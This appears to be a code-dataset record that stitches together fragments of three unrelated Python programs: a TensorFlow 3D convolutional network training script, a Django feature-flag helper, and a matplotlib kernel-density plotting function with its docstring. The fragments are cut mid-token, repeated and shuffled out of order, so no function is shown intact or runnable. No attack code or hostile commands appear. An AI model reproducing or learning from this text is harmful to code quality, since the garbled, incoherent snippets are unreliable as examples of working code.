int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "a PhD program. The code is not free of bugs", "print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar,", "Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR = 10 PointStart", "# num of categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]),", "= '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see", "categorical variables. It has been developed by <NAME> and <NAME>", "decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) +", "but running end-to-end. Any comments and further improvements are well", "int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile", "LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI TempSimGrid =", "SGsizez - Num 2 HyperPar.append(int(7)) # Search_x - Num 3", "IPsizez - Num 8 HyperPar.append(50) # Percentage of Data Conditioning", "Num Fully Connected - Num 11 HyperPar.append(3) # wdnh -", "and further improvements are well recevied to: <EMAIL> April 16,", "= 10 PointStart = 1 for indTrain in range(Ncicles): #HyperPar[9]", "tf import time import External_Functions_3D as fns_nested import gc for", "Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training process-\" %", "# SGsizez - Num 2 HyperPar.append(int(7)) # Search_x - Num", "process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s", "HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50) # SGsizey -", "#print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import", "(\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage,", "of whole training process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect()" ]
[ "request: HttpRequest) -> bool: from django.conf import settings is_enabled =", "from django.conf import settings is_enabled = False attributes = _attributes_from_request(request)", "= False attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name,", "must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if not", "def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from django.conf import", "feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str, request: HttpRequest) ->", "Dict = None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request:", "logger.exception( \"Unexpected exception while trying to parse http-request for feature-attributes.\"", "django.conf import settings is_enabled = False attributes = _attributes_from_request(request) try:", "parse http-request for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str,", "None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) ->", "import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name:", "class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str = None,", "from django.http import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def", "return dict() attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff return", "logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str =", "= None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest)", "def _attributes_from_request(request: HttpRequest) -> Dict: if not request: return dict()", "_attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature", "return attributes except Exception: logger.exception( \"Unexpected exception while trying to", "settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except", "return dict() def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from", "http-request for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str, request:", "def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict", "dict() attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes", "FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if not request: return", "is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from django.conf import settings", "user_id: str = None, attributes: Dict = None): raise NotImplementedError(\"You", "except Exception: logger.exception( \"Unexpected exception while trying to parse http-request", "exception while trying to parse http-request for feature-attributes.\" ) return", "attributes except Exception: logger.exception( \"Unexpected exception while trying to parse", "FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes:", "enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to check feature-flag state", "logger.exception(f\"Exception while trying to check feature-flag state for '{feature_name}'\") return", "request: return dict() attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff", ") logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying", "is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to check feature-flag", "django.http import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self,", "attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while", "= settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\")", "while trying to check feature-flag state for '{feature_name}'\") return is_enabled", "attributes = dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes except", "'{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to check", "except Exception: logger.exception(f\"Exception while trying to check feature-flag state for", "logging from typing import Dict from django.http import HttpRequest logger", "dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception: logger.exception(", "attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes", "bool: from django.conf import settings is_enabled = False attributes =", "request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected exception while trying", "NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if", "dict() def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool: from django.conf", "\"Unexpected exception while trying to parse http-request for feature-attributes.\" )", "to parse http-request for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name:", "False attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\",", "= None, attributes: Dict = None): raise NotImplementedError(\"You must override", "is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict =", "for feature-attributes.\" ) return dict() def is_feature_enabled(feature_name: str, request: HttpRequest)", "import settings is_enabled = False attributes = _attributes_from_request(request) try: is_enabled", "logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id:", "attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected exception", "Dict from django.http import HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider:", "if not request: return dict() attributes = dict() try: attributes[\"is_staff\"]", "Exception: logger.exception(f\"Exception while trying to check feature-flag state for '{feature_name}'\")", "override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict: if not request:", "raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def _attributes_from_request(request: HttpRequest) -> Dict:", "user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception", "settings is_enabled = False attributes = _attributes_from_request(request) try: is_enabled =", "str = None, attributes: Dict = None): raise NotImplementedError(\"You must", "HttpRequest) -> bool: from django.conf import settings is_enabled = False", "= logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str, user_id: str", "import Dict from django.http import HttpRequest logger = logging.getLogger(__name__) class", "import logging from typing import Dict from django.http import HttpRequest", "try: attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected", "try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}'", "logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception: logger.exception(f\"Exception while trying to", "str, user_id: str = None, attributes: Dict = None): raise", "Exception: logger.exception( \"Unexpected exception while trying to parse http-request for", "HttpRequest logger = logging.getLogger(__name__) class FeatureFlagProvider: def is_feature_enabled(self, feature_name: str,", "typing import Dict from django.http import HttpRequest logger = logging.getLogger(__name__)", "= request.user.is_staff return attributes except Exception: logger.exception( \"Unexpected exception while", "feature_name: str, user_id: str = None, attributes: Dict = None):", "= dict() try: attributes[\"is_staff\"] = request.user.is_staff return attributes except Exception:", "None, attributes: Dict = None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\")", "_attributes_from_request(request: HttpRequest) -> Dict: if not request: return dict() attributes", "Dict: if not request: return dict() attributes = dict() try:", "-> bool: from django.conf import settings is_enabled = False attributes", "trying to parse http-request for feature-attributes.\" ) return dict() def", "= _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes )", "is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled( feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is", "from typing import Dict from django.http import HttpRequest logger =", "not request: return dict() attributes = dict() try: attributes[\"is_staff\"] =", "attributes: Dict = None): raise NotImplementedError(\"You must override FeatureFlagProvider.is_feature_enabled()\") def", "feature_name=feature_name, user_id=\"dontcare\", attributes=attributes ) logger.info(f\"Feature '{feature_name}' is enabled={is_enabled}\") except Exception:", "-> Dict: if not request: return dict() attributes = dict()", "str, request: HttpRequest) -> bool: from django.conf import settings is_enabled", "HttpRequest) -> Dict: if not request: return dict() attributes =", ") return dict() def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool:", "while trying to parse http-request for feature-attributes.\" ) return dict()", "is_enabled = False attributes = _attributes_from_request(request) try: is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled(" ]
[]
[ "for each time series. sharex [optional, default to True] In", "| green | +------+---------+ | r | red | +------+---------+", "1], # ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\", []],", "\"log\": logy = True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim =", "take for the standard linestyles list. \"\"\" plt = kde(", "values to end each vertical line. If a list must", "marker types. Otherwise on the command line a comma separated", "[]], 1], # label_skip=[int, [\"range\", [1, None]], 1], # drawstyle=[str,", "\"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", #", "The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all", "# \"vibrant\", # \"muted\", # \"retro\", # ], # ],", "--logx use --xaxis=\"log\" * For --logy use --yaxis=\"log\" * For", "\"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors,", "a list must be same length as `hlines_y`. If a", "all vertical lines. If a list must be same length", "[ # \"domain\", # [ # \"classic\", # \"Solarize_Light2\", #", "s | square | +-------+----------------+ | p | pentagon |", "the maximum x value for the entire plot. hlines_colors: [optional,", "the implementation of # mando legend = bool(legend == \"\"", "ylim=[float, [\"pass\", []], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1],", "the various time-series automatically. scatter_matrix_diagonal : str [optional, defaults to", "+-------+----------------+ | 4 | tri_right | +-------+----------------+ | 8 |", "nylim[0] if vlines_ymax is None: vlines_ymax = nylim[1] if type", "and gray, however the \"ieee\" also will change the chart", "None], # bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \"", "[\"auto\", None, \"\", \" \", \" \"] + plotutils.HATCH_LIST], None],", "| > | triangle right | +-------+----------------+ | 1 |", "clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend,", "Description | +=================+===================+ | / | diagonal hatching | +-----------------+-------------------+", "4. Any of the HTML color names. +------------------+ | HTML", "[]], 1], # subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool,", "defaults to None] List of colors for the vertical lines.", "legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y,", "import absolute_import, division, print_function import itertools import os import warnings", "[\"pass\", []], None], # hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[", "to plot. You supplied '{}' for style which has {}", "+-------+----------------+ | None | nothing | +-------+----------------+ | ' '", "however the \"ieee\" also will change the chart size to", "the maximum x value for all vertical lines. A missing", "maximum x value for the entire plot. hlines_colors: [optional, defaults", "+-------+----------------+ | x | x | +-------+----------------+ | D |", "upper limits for the y-axis of the plot. See `xlim`", "[optional, defaults to 'plot.png'] Output filename for the plot. Extension", "| +---------+--------------+ | : | dotted | +---------+--------------+ | None", "else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is None: markerstyles =", "| m | magenta | +------+---------+ | y | yellow", "clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None,", "ylim [optional, default is based on range of y values]", "ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index, line in enumerate(ax.lines): if", "None: if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x))", "defaults to 'kde'] If plot type is 'scatter_matrix', this specifies", "= [\" \"] else: linestyles = [\" \" if i", "The default ' ' will not plot a marker. If", "hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds,", "hlines_colors: [optional, defaults to None] List of colors for the", "plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax =", "def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None,", "lag_plot_lag [optional, default to 1] The lag used if ``type``", "'markerstyles' options. Currently the 'style' option will override the others.", "# xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\", []], 2],", "to start the horizontal line. If a list must be", "For --logx use --xaxis=\"log\" * For --logy use --yaxis=\"log\" *", "False]], 1], # colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\",", "( logx is True or logy is True or norm_xaxis", "[optional, default to 'auto'] If 'auto' will iterate through the", "color pallette in the current plot style. vlines_linestyles: [optional, defaults", "missing value or None will end at the maximum x", "``type`` \"lag_plot\" is chosen. xtitle : str [optional, default depends", "- | horizontal | +-----------------+-------------------+ | + | crossed |", "is to help pretty print the frequency try: try: pltfreq", "None: markerstyles = \" \" if style != \"auto\": nstyle", "[optional, default to ' '] The default ' ' will", "[]], None], # xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\",", "| tri_up | +-------+----------------+ | 3 | tri_left | +-------+----------------+", "enumerate(ax.lines): if icolors is not None: c = next(icolors) else:", "hlines_y | +-------+----------------+ | None | nothing | +-------+----------------+ |", "+------------------+ | burlywood | +------------------+ | chartreuse | +------------------+ |", "index, line in enumerate(ax.lines): if icolors is not None: c", "ytitle : str [optional, default depends on ``type``] Title of", "this specifies the plot along the diagonal. One of 'kde'", "Color | +======+=========+ | b | blue | +------+---------+ |", "defaults to None] List of linestyles for the horizontal lines.", "matplotlib colors in the chosen style. At the command line", "if style != \"auto\": nstyle = tsutils.make_list(style) if len(nstyle) !=", "_ | hlines_y | +-------+----------------+ | None | nothing |", "or within Python a list of color code strings. Can", "of using the 'style' keyword. +-------+----------------+ | Code | Markers", "# Only for bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles =", "strings for each time-series in the data set. subplots [optional,", "of probability density function. \"kde\" will create a plot of", "| -. | dash_dot | +---------+--------------+ | : | dotted", "invert_yaxis [optional, default is False] Invert the y-axis. plotting_position :", "is None) type = \"kde\" import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot", "lines. A missing value or None will end at the", "'auto' will iterate through the available matplotlib marker types. Otherwise", "# markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is", "example 'filename.png' will create a PNG file. If used within", "horizontal line. hlines_xmin: [optional, defaults to None] List of minimum", "If a single color then will be used as the", "color code strings. Can identify colors in four different ways.", "ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy,", "label_rotation : int [optional] Rotation for major labels for bar", "| None | nothing | +-------+----------------+ | ' ' |", "``|`` | vertical | +-----------------+-------------------+ | - | horizontal |", "1] The lag used if ``type`` \"lag_plot\" is chosen. xtitle", "with color blindness. Black, White, and Gray Styles The \"ieee\"", "\" \", \" \"] + plotutils.HATCH_LIST], None], # style=[str, [\"pass\",", "True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles", "produce step-plots. 'steps' is equivalent to 'steps-pre' and is maintained", "current style. 2. Single character code from the table below.", "upper limit to 1000. ylim [optional, default is based on", "subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool, [\"domain\", [True, False]],", "default is 'arithmetic'] Defines the type of the xaxis. One", "the maximum x value for all horizontal lines. A missing", "markerstyles = plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is", "for st in nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\"", "50] The size of the random subset for 'bootstrap' plot.", "None] Number or list of y values where to place", "plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors,", "for Kernel Density Estimation or 'hist' for a histogram. bootstrap_size", "histogram. bootstrap_size : int [optional, defaults to 50] The size", "| +=======+================+ | . | point | +-------+----------------+ | o", "norm_xaxis is True or norm_yaxis is True or lognorm_xaxis is", "you have {} time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) ) )", "Can identify colors in four different ways. 1. Use 'CN'", "multiple styles then each over rides some or all of", "# \"grayscale\", # \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\",", "codes in 'ColorMarkerLine' order, for example 'r*--' is a red", "defaults to 500] The number of random subsets of 'bootstrap_size'.", "time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) ) ) ) colors =", "diamond | +-------+----------------+ | d | thin diamond | +-------+----------------+", "line where x == y. Set to a line style", "| +-----------------+-------------------+ | ``|`` | vertical | +-----------------+-------------------+ | -", "OR (2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq =", "is True or lognorm_xaxis is True or lognorm_yaxis is True", "be same length as `vlines_x`. If None will take for", "g | green | +------+---------+ | r | red |", "through matplotlib colors in the chosen style. At the command", "division, print_function import itertools import os import warnings import mando", "a list must be same length as `hlines_y`. If None", "+-------+----------------+ | _ | hlines_y | +-------+----------------+ | None |", "[optional, defaults to 'kde'] If plot type is 'scatter_matrix', this", "vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\", []], 1], #", "backward-compatibility. ACCEPTS:: ['default' | 'steps' | 'steps-pre' | 'steps-mid' |", "The \"ieee\" style is appropriate for black, white, and gray,", "] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize)", "in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin,", "the time-series names associated with the input data. The 'legend_names'", "characteristics of the previous. Color Blind Appropriate Styles The styles", "False] Whether to plot on the secondary y-axis. If a", "[optional, defaults to True] Whether to display the legend. legend_names", "'--yaxis=\"log\"' instead. xlim [optional, default is based on range of", "in a column of the \"IEEE\" journal. The \"grayscale\" is", "useful for photo-copyable black, white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html", "style code. grid [optional, default is False] Whether to plot", ": str [optional, default is 'descending'] How to sort the", "invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None,", "invert_xaxis [optional, default is False] Invert the x-axis. invert_yaxis [optional,", "tri_right | +-------+----------------+ | 8 | octagon | +-------+----------------+ |", "[optional, default depends on ``type``] Title of y-axis. title :", "colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\",", "burlywood | +------------------+ | chartreuse | +------------------+ | ...etc. |", "yaxis. One of 'arithmetic', 'log'. secondary_y [optional, default is False]", "plots. drawstyle : str [optional, default is 'default'] 'default' connects", "\"\"\" plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows,", "'--xlim ,1000' would base the lower limit on the data", "minimum x values to start the horizontal line. If a", "markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"] +", "the available matplotlib hatch types. Otherwise on the command line", "triangle down | +-------+----------------+ | ^ | triangle up |", "would normally use the time-series names associated with the input", "override the names in the data set. You must supply", "minimum x value for the entire plot. hlines_xmax: [optional, defaults", "norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead.", "\"\" or legend == \"True\" or legend is None) type", "linestyle=l) ytitle = ytitle or \"Density\" if legend is True:", "where 0 is white an 1 is black. 4. Any", "\"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", #", "tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors)", "is not None: icolors = itertools.cycle(colors) else: icolors = None", "a single number will be used as the minimum x", "linestyle code. Separated 'colors', 'linestyles', and 'markerstyles' instead of using", "style. vlines_linestyles: [optional, defaults to None] List of linestyles for", "``type``] Title of y-axis. title : str [optional, defaults to", "\"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ], # 1, # ],", "matplotlib line types. Otherwise on the command line a comma", "to False] Make separate subplots for each time series. sharex", "estimation (KDE). {ydata} Parameters ---------- {input_ts} ofilename : str [optional,", "list must be same length as `vlines_x`. If None will", "lower limit on the data and set the upper limit", "st in nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \")", "os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for i in plot_styles", "= tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim,", ": int [optional] Rotation for major labels for bar plots.", "| +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED: use", "= tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index,", "be same length as `hlines_y`. If None will take from", "on range of y values] Comma separated lower and upper", "entire plot. vlines_colors: [optional, defaults to None] List of colors", "end at the maximum x value for the entire plot.", "[\"pass\", []], 1], # type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int,", "1], # drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\", [True,", "nylim = ax.get_ylim() if vlines_ymin is None: vlines_ymin = nylim[0]", "plotting_position=[ # str, # [ # \"domain\", # [\"weibull\", \"benard\",", "defaults to None] List of minimum y values to start", "hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[ # str, # [\"domain\",", "logy is True or norm_xaxis is True or norm_yaxis is", "xy_match_line : str [optional, defaults is ''] Will add a", "of colors for the vertical lines. If a single color", "[optional, default is \"default\"] Set the style of the plot.", "is white an 1 is black. 4. Any of the", "line in enumerate(ax.lines): if icolors is not None: c =", "for all vertical lines. A missing value or None will", "-. | dash_dot | +---------+--------------+ | : | dotted |", "colors = tsutils.make_list(colors) if linestyles == \"auto\": linestyles = plotutils.LINE_LIST", "# bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None,", "square | +-------+----------------+ | p | pentagon | +-------+----------------+ |", "or None will start at the minimum x value for", "dots | +-----------------+-------------------+ | * | stars | +-----------------+-------------------+ logx", "used as the linestyle for all vertical lines. If a", "the major ticks. label_rotation : int [optional] Rotation for major", "values where to place a horizontal line. hlines_xmin: [optional, defaults", "List of minimum x values to start the horizontal line.", "logx = True if yaxis == \"log\": logy = True", "'--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line : str", "to None] Legend would normally use the time-series names associated", "is not None: c = next(icolors) else: c = None", "hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) #", "to 'steps-pre' and is maintained for backward-compatibility. ACCEPTS:: ['default' |", "Currently the 'style' option will override the others. Comma separated", "[\"domain\", [\"auto\", None, \"\", \" \", \" \"] + plotutils.LINE_LIST],", "[\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\", [True, False]], 1],", "of the plot. See `xlim` for examples. xaxis : str", "the type, for example 'filename.png' will create a PNG file.", "maximum x values to end each horizontal line. If a", "| dotted | +---------+--------------+ | None | draw nothing |", "style useful for photo-copyable black, white, nd gray. Matplotlib styles:", "tsutils.make_list(markerstyles) if markerstyles is None: markerstyles = \" \" if", "| ``+`` | plus | +-------+----------------+ | x | x", "# \"classic\", # \"Solarize_Light2\", # \"bmh\", # \"dark_background\", # \"fast\",", "For example, '--xlim 1,1000' would limit the plot from 1", "None will take from the color pallette in the current", "[\"pass\", []], None], # hlines_linestyles=[ # str, # [\"domain\", [\"auto\",", "if using the Python API. To not display lines use", "| r | red | +------+---------+ | c | cyan", "markerstyles = \" \" if style != \"auto\": nstyle =", "chart size to fit in a column of the \"IEEE\"", "used if ``type`` \"lag_plot\" is chosen. xtitle : str [optional,", "Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are", "will be used as the minimum x values for all", "of the various time-series automatically. scatter_matrix_diagonal : str [optional, defaults", "list. vlines_x: [optional, defaults to None] List of x values", "black. 4. Any of the HTML color names. +------------------+ |", "marker. bar_hatchstyles [optional, default to \"auto\", only used if type", "the characteristics of the previous. Color Blind Appropriate Styles The", "drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag,", "Just combine codes in 'ColorMarkerLine' order, for example 'r*--' is", "style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [", "\"fivethirtyeight\", # \"ggplot\", # \"grayscale\", # \"seaborn\", # \"seaborn-bright\", #", "is not None: l = next(ilinestyles) else: l = None", "yaxis == \"log\": logy = True xlim = plotutils.know_your_limits(xlim, axis=xaxis)", "style. 2. Single character code from the table below. 